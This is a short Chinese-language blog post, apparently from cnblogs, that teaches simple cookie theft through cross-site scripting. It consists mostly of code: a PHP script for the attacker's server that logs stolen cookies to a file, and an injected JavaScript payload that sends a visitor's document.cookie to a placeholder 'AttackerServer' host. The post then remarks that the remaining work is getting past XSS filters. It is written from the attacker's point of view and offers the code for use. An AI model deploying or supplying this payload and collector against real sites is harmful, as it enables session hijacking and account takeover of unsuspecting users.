• 简单的cookie盗取


    此文需要有一定的javascripthtmlphp方面的只是作为基础

    直接上代码:

    #用于抓取盗窃来的cookie的php文件,此文件需置于攻击者的服务器上,这里包含了两种写法:Method1和Method2
    #保存为getCookie.php
    <?php  
    
    #Method 1
    
    // $info=getenv("QUERY_STRING");
    // if ($info) 
    // {
    // 	# code...
    // 	$info=urldecode($info);
    // 	$fp=fopen("info.txt","a");
    // 	fwrite($fp,$info."
    
    
    
    ");
    // 	fclose($fp);
    // }
    
    
    #Method2
    
    $cookie = $_GET['cookie'];
    $log = fopen("cookie.txt", "a");
    fwrite($log, $cookie ."
    ");
    fclose($log); 
    
    ?> 
    

     接下来需要再被攻击者的服务器页面上注入一段javascript代码,用于将被攻击者的cookie传送到我们的服务器上

    <script>
    document.location='http://AttackerServer/getCookie.php?cookie='+document.cookie;
    </script>

    当被攻击者的浏览器加载了被恶意注入的代码后,就会向攻击者的服务器发送自己的cookie,从而达到了盗取用户cookie的目的

    *注:当你浏览某个需要登陆的页面(比如论坛)时,在登录之后,把地址栏清空后在地址栏里写入javascript:alert(document.cookie)。你就会看到这个登陆页面在你计算机里保存的cookie。

    解析:

    可以看到,两种方法写的盗取cookie的攻击者脚本并不难,仅仅只做了一个接收参数,保存为文件的工作。

    cookie盗取真正难的部分应该还是在于,如何向被攻击者的页面注入这段javascript脚本。这就要借助XSS跨站脚本攻击的一些手法,在对方管理员做了严格限制的情况下,需要想办法绕过XSS的过滤,才能使我们的cookie盗取奏效。

  • 相关阅读:
    我也受不了这扯蛋的IE6/7了
    子元素的margintop与父元素合并的问题
    在是否使用浮动上的纠结
    CSS中zoom:1是怎么回事
    java.util.ConcurrentModificationException异常解决方法
    【转】单例模式
    servlet中实现页面跳转的两种方法
    tomcat日志,用户以及启动时的一些问题
    【转】自定义 Java Annotation
    jsoup的使用
  • 原文地址:https://www.cnblogs.com/zlgxzswjy/p/6443336.html
Copyright © 2020-2023  润新知